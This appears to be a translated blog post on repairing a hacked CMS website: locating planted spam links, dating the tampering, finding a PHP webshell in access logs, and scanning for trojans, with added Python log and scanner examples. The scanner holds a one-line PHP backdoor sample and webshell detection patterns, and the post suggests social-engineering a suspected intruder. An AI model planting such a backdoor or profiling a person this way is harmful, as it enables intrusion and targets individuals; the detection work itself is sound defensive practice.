Post-invasion repair and prevention notes for Linux sites

Source: Internet
Author: User
Tags: eval

A long time ago I built a site with a CMS, collected some content, and then stopped caring about it; it turned into an unmaintained junk site that nobody looked after. Yesterday I happened to notice that hidden SEO links ("black links") had been planted on it at some point. The site had been broken into before: all of its data had been downloaded and the template had been sold on ...
I have previously shared how to do intrusion analysis on other people's websites; this time my own site has been compromised. So let me take this opportunity to share the repair and prevention steps taken after the intrusion, looking for a breakthrough in the unity of opposites that is attack and defense.

1. Finding the problem

Although it is a small site that I no longer manage, I still open it occasionally to look around, check the links and clean up the links and the like. While cleaning up the links this time, I found that an extra block had appeared in the page code:

(Figure: the black-link code found on the home page)

From this we can conclude that the site has been compromised and is under someone else's control.

2. Finding the tampered files and determining the time of the intrusion

Finding the tampered files lets you determine the time of the intrusion from the file modification time; you can then go back to the access log for that period and locate the source of the intrusion.

(Figure: locating the tampered files)

The hacked site uses a template I wrote myself, so I went straight to the template for the home page that had been tampered with and found that its last modification time was 2012/10/31 18:49; that can be taken as the last time the black links were planted.

3. Finding the log entries for the intrusion time

Because this CMS generates static HTML for the whole site, log analysis is relatively easy. Obtaining a webshell is usually the first step of an intrusion, so look directly at the access log for requests to dynamic files in the period just before and after the page was tampered with.

(Figure: locating the webshell)

This requires some judgement, because the intruder will certainly disguise the location and name of the webshell. Screen the log by a few principles: a file that looks wrong appears in a location where it does not belong, or a file that should never be requested was requested. After narrowing it down to common.php, I found that it was a PHP "pony" (a one-line trojan).
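As an added example (not code from the original post), the following Python script does the log-window search described in sections 2 and 3: it takes the tampered file's modification time, keeps only the requests for dynamic (PHP) files in a window around that time, and ranks the source IPs that POSTed to dynamic files or requested dynamic files outside the site's known set. The log lines, the IP addresses, the /data/cache/ path, the known-entry-point list and the +0800 timezone are constructed for the example; only the 2012/10/31 18:49 timestamp and the file name common.php come from the post.

```python
"""Correlate a tampered file's mtime with the web access log: list the
requests for dynamic (PHP) files in a window around that time and rank
the source IPs. Added example; the log lines are constructed, not real."""
import re
from datetime import datetime, timedelta, timezone

# Apache/nginx combined log format, e.g.
# 198.51.100.7 - - [31/Oct/2012:18:41:15 +0800] "POST /x.php HTTP/1.1" 200 87
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Last-modified time of the tampered home-page template (from the post);
# the +0800 offset is an assumption.
TAMPER_TIME = datetime(2012, 10, 31, 18, 49, tzinfo=timezone(timedelta(hours=8)))

# Dynamic entry points this site legitimately serves (assumed for the example).
KNOWN_DYNAMIC = {"/index.php", "/admin/index.php", "/search.php"}
DYNAMIC_EXT = (".php", ".php5", ".phtml")

# Constructed sample log; 198.51.100.7 plays the intruder.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Oct/2012:12:03:44 +0800] "GET /index.html HTTP/1.1" 200 4210
198.51.100.7 - - [31/Oct/2012:18:40:02 +0800] "GET /index.php?s=a HTTP/1.1" 200 3100
198.51.100.7 - - [31/Oct/2012:18:41:15 +0800] "POST /data/cache/common.php HTTP/1.1" 200 87
203.0.113.9 - - [31/Oct/2012:18:45:10 +0800] "GET /about.html HTTP/1.1" 200 1800
198.51.100.7 - - [31/Oct/2012:18:48:30 +0800] "POST /data/cache/common.php HTTP/1.1" 200 87
10.0.0.5 - - [31/Oct/2012:23:10:00 +0800] "GET /index.html HTTP/1.1" 304 0
this line is deliberately malformed and must be skipped
"""

def parse_line(line):
    """Parse one log line; return a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec

def dynamic_requests_near(lines, tamper_time=TAMPER_TIME,
                          before=timedelta(hours=2), after=timedelta(minutes=10)):
    """Requests for dynamic files within [tamper_time - before, tamper_time + after]."""
    lo, hi = tamper_time - before, tamper_time + after
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not (lo <= rec["time"] <= hi):
            continue
        if not rec["path"].lower().endswith(DYNAMIC_EXT):
            continue  # the site is static HTML, so only dynamic hits matter
        rec["unexpected"] = rec["path"] not in KNOWN_DYNAMIC
        hits.append(rec)
    return hits

def rank_sources(lines, tamper_time=TAMPER_TIME):
    """Count, per source IP, the suspicious dynamic requests near the tamper
    time: POSTs, or any request for a dynamic file outside the known set."""
    score = {}
    for rec in dynamic_requests_near(lines, tamper_time):
        if rec["unexpected"] or rec["method"] == "POST":
            score[rec["ip"]] = score.get(rec["ip"], 0) + 1
    return sorted(score.items(), key=lambda kv: (-kv[1], kv[0]))

if __name__ == "__main__":
    for rec in dynamic_requests_near(SAMPLE_LOG.splitlines()):
        flag = "UNEXPECTED" if rec["unexpected"] else ""
        print(rec["time"], rec["ip"], rec["method"], rec["path"], flag)
    print(rank_sources(SAMPLE_LOG.splitlines()))
```

On a real server, replace SAMPLE_LOG with the lines of the access log (rotated logs included) and set TAMPER_TIME from `stat` on the tampered file; the window widths are a starting point and should be widened if nothing shows up, since a webshell is often uploaded well before it is used.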

4. Fixing the site's vulnerabilities and the tampered content

Since the site runs a released version of the CMS, an online search will tell you which vulnerabilities it has; fix them as the advisories describe. Restrict write access to directories and execution rights for dynamic files, change the site's database and back-end passwords, repair the tampered pages and restore the original ones.

5. Hunting for PHP trojans

Download a PHP trojan scanning script from the Internet and run it, or use the following commands to search the files:


# list the PHP files under /site/ that contain eval(  (-l prints file names only;
# -print0 / -0 keep file names with spaces intact)
find /site/ -type f -name "*.php" -print0 | xargs -0 grep -l "eval("
# same for base64_decode, case-insensitive (-i), since PHP function names are case-insensitive
find /site/ -type f -name "*.php" -print0 | xargs -0 grep -il "base64_decode"
# several known shell names and obfuscation patterns in one pass; the pattern must be
# quoted, otherwise the shell treats each | as a pipe
find /site/ -type f -name "*.php" -print0 | xargs -0 egrep -l 'phpspy|c99sh|milw0rm|eval\(gzuncompress|eval\('

Analyse the search results to find and delete the backdoor.
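As an added example that generalizes the find/grep commands above (it is not code from the original post), the following Python scanner walks a site tree, checks every PHP file against several webshell indicators, and reports each hit with its modification time so that it can be compared with the tampering time found in section 2. The indicator names eval, base64_decode, phpspy, c99sh and milw0rm come from the post's commands; the weights, the extra patterns, and the sample site it builds in a temporary directory, including the one-line backdoor fixture placed in a file named common.php, are constructed for the example.

```python
"""Walk a site tree, flag PHP files that contain common webshell
indicators, and report them with their mtime. Added example; the sample
files it creates are constructed, not from the compromised site."""
import os
import re
import tempfile
from datetime import datetime

# (name, pattern, weight). The first four mirror the grep/egrep strings in
# the post; the last two catch request-driven execution and the deprecated
# preg_replace /e modifier.
INDICATORS = [
    ("eval", re.compile(r"\beval\s*\(", re.I), 2),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\(", re.I), 1),
    ("decompress", re.compile(r"\b(gzuncompress|gzinflate|str_rot13)\s*\(", re.I), 1),
    ("known shell names", re.compile(r"phpspy|c99sh|milw0rm", re.I), 3),
    ("exec of request data",
     re.compile(r"\b(system|passthru|shell_exec|exec|assert)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I), 3),
    ("preg_replace /e", re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I), 2),
]
PHP_EXT = (".php", ".php3", ".php4", ".php5", ".phtml")

def scan_file(path):
    """Return the indicator hits, a summed score and the mtime for one file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    matched = [(name, weight) for name, rx, weight in INDICATORS if rx.search(src)]
    mtime = datetime.fromtimestamp(os.stat(path).st_mtime)
    return {
        "path": path,
        "mtime": mtime.strftime("%Y/%m/%d %H:%M"),
        "indicators": [name for name, _ in matched],
        "score": sum(weight for _, weight in matched),
    }

def scan_tree(root):
    """Scan every PHP file under root; return the files with hits, highest score first."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(PHP_EXT):
                rec = scan_file(os.path.join(dirpath, fn))
                if rec["score"]:
                    results.append(rec)
    results.sort(key=lambda r: (-r["score"], r["path"]))
    return results

# Constructed sample site: two clean PHP files, a stylesheet, and one file of
# the kind the post calls a PHP "pony" (a one-line backdoor), used as the
# detection fixture.
SAMPLE_FILES = {
    "index.php": "<?php include 'lib/site.php'; echo render_home(); ?>\n",
    "lib/site.php": "<?php function render_home() { return file_get_contents('home.html'); } ?>\n",
    "static/style.css": "body { color: #333 }\n",
    "data/cache/common.php": "<?php @eval(base64_decode($_POST['c'])); ?>\n",
}

def build_sample_site():
    """Write SAMPLE_FILES into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="phpscan_")
    for rel, body in SAMPLE_FILES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

def demo():
    """Build the constructed sample site and scan it."""
    return scan_tree(build_sample_site())

if __name__ == "__main__":
    for rec in demo():
        print(rec["mtime"], rec["score"], rec["path"], ", ".join(rec["indicators"]))
```

The scanner only reports; as the post says, every hit still has to be read by a person, because legitimate CMS code also uses base64_decode and sometimes eval. Sorting by score and printing the mtime makes the files whose modification time sits near the tampering time stand out first.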

6. Tracing the intruder from the IP address

Investigating on your own involves too many factors to find the real attacker. A spoofed IP, a dynamic ADSL IP or a public IP shared by a broadband connection, for instance, will not be easy to trace. If the attack is serious, contact the public security authorities directly and preserve the evidence; be aware that the national system does keep records of Internet activity.

We ordinary people can try searching for the IP addresses from the log in a search engine; there may be something to be found. Sure enough, the search results contained an entry that matched the intruder's IP exactly.

(Figure: searching for the IP in a search engine)

Opening that page showed that the IP came from a particular user, but that by itself does not prove much. It would be persuasive if that user had been active at the same time as the intrusion. If you are interested, you can also use social-engineering techniques to analyse that user and confirm whether they are the intruder.

7. Brief summary

Network security is the perfect embodiment of the barrel (weakest-stave) effect: a single vulnerability or a single security misconfiguration can be the deciding factor in an intrusion. In day-to-day operations you must carefully and meticulously carry out every security precaution and preventive measure.

From the intruder's side: at the end of an intrusion the most important step is what is commonly called "wiping your backside", clearing all kinds of log information so as not to leave trouble for oneself. Another point is that if a backdoor needs to be left, it will be hidden deeply for later use; if no backdoor is needed, the related files will be cleaned up to avoid future problems.

Incidentally, the intruder's tampering with the files is already a violation of the law; network security enthusiasts, please do not imitate it casually.
